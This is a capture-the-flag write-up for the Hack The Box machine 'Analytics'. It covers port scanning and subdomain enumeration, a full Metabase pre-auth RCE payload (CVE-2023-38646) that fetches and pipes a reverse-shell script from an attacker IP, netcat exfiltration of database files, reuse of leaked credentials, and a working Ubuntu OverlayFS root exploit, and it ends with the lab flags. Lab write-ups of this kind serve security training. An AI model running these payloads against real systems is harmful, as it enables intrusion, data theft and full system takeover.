Analytics

Recon

nmap_scan.log

.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog         :
: https://github.com/RustScan/RustScan :
 --------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/rustscan/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.129.229.224:22
Open 10.129.229.224:80
[~] Starting Script(s)
[>] Running script "nmap -vvv -p {{port}} {{ip}} -vvv -sV -sC -Pn" on ip 10.129.229.224
Depending on the complexity of the script, results may take some time to appear.
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Warning: Hit PCRE_ERROR_MATCHLIMIT when probing for service http with the regex '^HTTP/1\.1 \d\d\d (?:[^\r\n]*\r\n(?!\r\n))*?.*\r\nServer: Virata-EmWeb/R([\d_]+)\r\nContent-Type: text/html; ?charset=UTF-8\r\nExpires: .*<title>HP (Color |)LaserJet ([\w._ -]+)&nbsp;&nbsp;&nbsp;'
[~] Starting Nmap 7.95 ( https://nmap.org ) at 2024-11-24 13:28 UTC
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:28
Completed NSE at 13:28, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:28
Completed NSE at 13:28, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:28
Completed NSE at 13:28, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 13:28
Completed Parallel DNS resolution of 1 host. at 13:28, 0.04s elapsed
DNS resolution of 1 IPs took 0.04s. Mode: Async [#: 1, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating Connect Scan at 13:28
Scanning 10.129.229.224 [2 ports]
Discovered open port 80/tcp on 10.129.229.224
Discovered open port 22/tcp on 10.129.229.224
Completed Connect Scan at 13:28, 0.08s elapsed (2 total ports)
Initiating Service scan at 13:28
Scanning 2 services on 10.129.229.224
Completed Service scan at 13:28, 6.23s elapsed (2 services on 1 host)
NSE: Script scanning 10.129.229.224.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:28
Completed NSE at 13:28, 3.21s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:28
Completed NSE at 13:29, 0.39s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:29
Completed NSE at 13:29, 0.00s elapsed
Nmap scan report for 10.129.229.224
Host is up, received user-set (0.077s latency).
Scanned at 2024-11-24 13:28:49 UTC for 11s

PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc=
|   256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://analytical.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:29
Completed NSE at 13:29, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:29
Completed NSE at 13:29, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:29
Completed NSE at 13:29, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.60 seconds

HTTP (80)

Writeup.png

Enumerate subdomains:

└─$ domain='analytical.htb'; ffuf -u "http://$domain/" -H "Host: FUZZ.$domain" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -mc all -fw 4
       v2.1.0-dev
data                    [Status: 200, Size: 77858, Words: 3574, Lines: 28, Duration: 153ms]
:: Progress: [4989/4989] :: Job [1/1] :: 564 req/sec :: Duration: [0:00:09] :: Errors: 0 ::

Metabase is running on this subdomain

Writeup-1.png

Application version is disclosed in the source: v0.46.6

Writeup-2.png

Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646)CVE-2023-38646 PoC

The PoC didn't work for me for some reason, error about Vector arg to map conj must be a pair so it must be related to base64 blob and bash.

I just used curl to get the shell:

{
    "token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
    "details": {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules": {},
        "details":{
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER pwnshell BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\njava.lang.Runtime.getRuntime().exec('bash -c {curl,10.10.14.42/rev}|{bash,-i}')\n$$--=x",
            "advanced-options": false,
            "ssl": true
               },
        "name": "test",
        "engine": "h2"
    }
}

Application contains database.db (directory...), but no sqlite3.

3d6ddc86c8c7:/$ sqlite3 metabase.db .dump
bash: sqlite3: command not found

Download via netcat:

3d6ddc86c8c7:/metabase.db$ busybox nc 10.10.14.42 4444 < metabase.db.mv.db
3d6ddc86c8c7:/metabase.db$ busybox nc 10.10.14.42 4444 < metabase.db.trace.db

metabase.db.mv.db file is a H2 Server database file, DBeaver can be used to open it. I don't think the password is crackable so Im going to avoid it for now.

Writeup-3.png

Environment variables hold interesting data!

3d6ddc86c8c7:/metabase.db$ env
...
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=3d6ddc86c8c7
MB_DB_FILE=//metabase.db/metabase.db
PWD=/metabase.db
LOGNAME=metabase
META_USER=metalytics
META_PASS=An4lytics_ds20223#
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
...

SSH

Creds: metalytics:An4lytics_ds20223#

└─$ sshpass -p 'An4lytics_ds20223#' ssh metalytics@analytical.htb
metalytics@analytics:~$ id
uid=1000(metalytics) gid=1000(metalytics) groups=1000(metalytics)

User.txt

metalytics@analytics:~$ cat user.txt
43e261df0ac451cadc5cf55a4f543639

Privilege Escalation

Linpeas shows nothing interesting.

metalytics@analytics:~$ curl 10.10.14.42/lp.sh|sh|tee /tmp/lp.sh
...

As of doing retired box HTB suggests checking kernel version. Box was released on 07 Oct 2023 so there's probably some kernel exploit.

metalytics@analytics:~$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
metalytics@analytics:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Ubuntu
Description:    Ubuntu 22.04.3 LTS
Release:        22.04
Codename:       jammy

Ubuntu Local Privilege Escalation (CVE-2023-2640 & CVE-2023-32629)CVE-2023-2640-CVE-2023-32629

metalytics@analytics:~$ cd `mktemp -d`
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;
setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; u/python3 -c 'import os;os.setuid(0);os.system(\"id\")'"

uid=0(root) gid=0(root) groups=0(root)

metalytics@analytics:/tmp/tmp.J24NI1yLfM$ u/python3 -c $'import os;os.setuid(0);os.system("/bin/bash")'
root@analytics:/tmp/tmp.J24NI1yLfM# id
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)

Root.txt

root@analytics:/root# cat root.txt
f4730b8375b50900c99246cf7471f399